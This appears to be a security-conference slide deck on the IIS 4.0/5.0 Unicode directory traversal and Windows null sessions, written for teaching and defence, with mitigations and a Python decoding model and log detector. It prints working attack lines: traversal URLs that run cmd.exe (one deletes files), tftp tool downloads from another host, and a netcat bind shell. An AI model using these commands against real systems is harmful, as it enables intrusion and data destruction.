Expose the Vulnerability
Paul Hogan
Ward Solutions
Session Prerequisites
Hands-on experience with Windows 2000 or Windows Server 2003
Working knowledge of networking, including basics of security
Basic knowledge of network security-assessment strategies
Level 300
Anatomy of a Hack
Information Gathering / Profiling
nslookup, whois
Probe / Enumerating
Superscan, nmap, nessus, nikto, banner grabbing, OS fingerprinting
Attack
Unicode directory traversal
Advancement
Entrenchment
Infiltration/Extraction
nslookup
RIPE Whois
superscan
Simple Command Line Utilities
net view \\172.16.10.5                      list the shares on the target (fails until a session exists)
net use \\172.16.10.5                       connect to the target (implicitly IPC$) with the current credentials
net use \\172.16.10.5 "" /u:""              null session: empty user and empty password (the "RedButton" vulnerability)
net view \\172.16.10.5                      the share listing now succeeds over the null session
nbtstat -A 172.16.10.5                      NetBIOS name table of the target: machine name, domain, logged-on user
nbtscan -r 172.16.10.0/24                   the same name-table query swept across the whole subnet
net use \\172.16.10.5 "" /u:guest           anonymous session as the Guest account
nmap nessus
nikto
Overview
Name: Microsoft IIS 4.0/5.0 Extended Unicode Directory Traversal Vulnerability (BugTraq ID 1806; Microsoft bulletin MS00-078, CVE-2000-0884)
Operating System: Windows NT 4.0 (+ IIS 4.0) and Windows 2000 (+ IIS 5.0)
Brief Description: A particular type of malformed URL could be used to access files and directories outside the web folders. This would potentially enable a malicious user to gain privileges equivalent to those of a locally logged-on user, because the request is executed in the security context of the anonymous web account, IUSR_machinename. With those permissions the malicious user could add, change or delete data, run code already on the server, or upload new code to the server and run it.
Impacts
If the e-business web server is compromised, the back-end database server is under threat too: trust relationships, shared passwords and database connection pools give the attacker a path to it, and the web server and database server can be used as relays connecting the outside machine to the internal machines. The firewall is then circumvented.
If the compromised web server is a software distribution site, the attacker can add Trojans or zombie code to the downloadable software and thereby control every machine that downloads software from that website.
Solutions
Install patches as soon as possible
Patch Management: SMS/SUS/MBSA (Systems Management Server, Software Update Services, Microsoft Baseline Security Analyzer)
Disable NetBIOS over TCP/IP
Be sure that the IUSR_machinename account does not have write access to any files on the server
Keep the web folders on a different logical drive from %SystemRoot%: the traversal cannot cross drives, so cmd.exe is out of reach when web content is not on the system drive
Unicode Directory Traversal Attack
The "/" after ".." is sent as %c0%af, an overlong UTF-8 encoding that IIS decoded only after its ".." check had already run (%c1%9c is the equivalent overlong "\").
http://172.16.10.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\+/s      (recursive directory listing of C: as IUSR_machinename)
http://172.16.10.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+del+c:\*.*       (destructive: deletes whatever IUSR_machinename may delete in the root of C:)
perl -x unicodexecute.pl 172.16.10.5:80 dir                                      (script that wraps the traversal URL around an arbitrary command)
perl -x unicodexecute.pl 172.16.10.5:80 tftp -i 172.10.10.21 GET *.*             (pull attacker tools onto the target over TFTP)
perl -x unicodexecute.pl 172.16.10.5:80 nc -L -p 555 -d -e cmd.exe               (bind shell: netcat listens on port 555 and hands each connection to cmd.exe)
c:\nc 192.168.1.2 443
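The URLs above work because IIS ran its ".." check before it had finished decoding the request. The following Python model is an added example, not code from the original deck: it reproduces that decoding order in a toy path resolver (the Overview and Attack slides describe the behaviour, not this code), puts a hardened resolver beside it that decodes strictly and checks containment after canonicalisation, and runs a detector over a few constructed W3C-style log lines. The web root `/inetpub/scripts`, the `/scripts` prefix, the client IP and the log lines are assumptions made for the example.

```python
"""Decoding-order model of the IIS 4.0/5.0 Unicode traversal (MS00-078 / BugTraq 1806).

Added example, not code from the original deck. URL_PREFIX, WEBROOT and the
log lines are constructed for illustration.
"""
from __future__ import annotations

import posixpath
import re
from urllib.parse import unquote_to_bytes

URL_PREFIX = "/scripts"          # assumed virtual directory used on the slides
WEBROOT = "/inetpub/scripts"     # assumed filesystem location of that directory


def lenient_utf8(raw: bytes) -> str:
    """Decode UTF-8 while ACCEPTING overlong two-byte forms, as the vulnerable server did.

    0xC0 0xAF -> ((0xC0 & 0x1F) << 6) | (0xAF & 0x3F) = 0x2F = '/', and
    0xC1 0x9C -> 0x5C = '\\'. A conforming decoder rejects both: ASCII is one byte.
    """
    out: list[str] = []
    i = 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            raise ValueError(f"unsupported byte 0x{b:02x} at offset {i}")
    return "".join(out)


def vulnerable_resolve(uri_path: str) -> str | None:
    """Vulnerable order: reject '..' segments first, decode UTF-8 afterwards.

    Returns the filesystem path the server would open, or None if rejected.
    """
    decoded = unquote_to_bytes(uri_path)                # %xx -> raw bytes, one pass
    if b".." in re.split(rb"[/\\]", decoded):           # '..\xc0\xaf..' is not a '..' segment
        return None
    text = lenient_utf8(decoded).replace("\\", "/")     # ...but now it has become '../..'
    if not text.startswith(URL_PREFIX + "/"):
        return None
    return posixpath.normpath(WEBROOT + text[len(URL_PREFIX):])


def hardened_resolve(uri_path: str) -> str | None:
    """Safe order: decode strictly and completely, canonicalise, then check containment."""
    try:
        text = unquote_to_bytes(uri_path).decode("utf-8")  # strict: 0xC0/0xC1 lead bytes rejected
    except UnicodeDecodeError:
        return None
    if "%" in text:                                     # refuse double-encoded input outright
        return None
    text = text.replace("\\", "/")
    if not text.startswith(URL_PREFIX + "/"):
        return None
    full = posixpath.normpath(WEBROOT + text[len(URL_PREFIX):])
    if full != WEBROOT and not full.startswith(WEBROOT + "/"):
        return None                                     # escaped the web root after canonicalisation
    return full


# A 0xC0/0xC1 lead byte followed by a continuation byte is overlong by definition, so this
# catches %c0%af, %c1%9c and every other two-byte disguise of an ASCII character.
OVERLONG = re.compile(r"%c[01]%[89ab][0-9a-f]", re.IGNORECASE)


def flag_request(uri_stem: str) -> str | None:
    """Return a reason if the request path looks like a traversal attempt, else None."""
    if OVERLONG.search(uri_stem):
        return "overlong UTF-8 sequence"
    try:
        text = unquote_to_bytes(uri_stem).decode("utf-8")
    except UnicodeDecodeError:
        return "invalid UTF-8"
    if ".." in re.split(r"[/\\]", text):
        return "dot-dot segment"
    return None


# Constructed W3C-style lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
SAMPLE_LOG = (
    "2000-10-17 10:23:41 172.16.10.21 GET /scripts/default.asp - 200\n"
    "2000-10-17 10:23:52 172.16.10.21 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\+/s 200\n"
    "2000-10-17 10:24:03 172.16.10.21 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir 200\n"
    "2000-10-17 10:24:15 172.16.10.21 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404\n"
)


def scan_log(text: str) -> list[tuple[str, str]]:
    """Return (cs-uri-stem, reason) for every flagged request in a W3C-style log."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0].startswith("#"):
            continue
        reason = flag_request(fields[4])
        if reason:
            hits.append((fields[4], reason))
    return hits


if __name__ == "__main__":
    attack = "/scripts/..%c0%af../winnt/system32/cmd.exe"
    print("vulnerable:", vulnerable_resolve(attack))    # /winnt/system32/cmd.exe
    print("hardened:  ", hardened_resolve(attack))      # None
    for stem, reason in scan_log(SAMPLE_LOG):
        print(f"{reason:24} {stem}")
```

The plain `../../` form is rejected by both resolvers, which is exactly why the attack needed the overlong encoding; the hardened resolver also refuses any path that still contains `%` after one decoding pass, so a second layer of encoding cannot be used to reintroduce the same trick.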
How To Get Your Network Hacked In 10 Easy Steps
1. Don't patch anything
2. Run unhardened applications
3. Logon everywhere as a domain admin
4. Open lots of holes in the firewall
5. Allow unrestricted internal traffic
6. Allow all outbound traffic
7. Don't harden servers
8. Use lame passwords
9. Use high-level service accounts, in multiple places
10. Assume everything is OK
The moral
Initial entry is everything
Most networks are designed like egg shells
Hard and crunchy on the outside
Soft and chewy on the inside
Once an attacker is inside the network you can…
Update resume
Hope he does a good job running it
Drain the network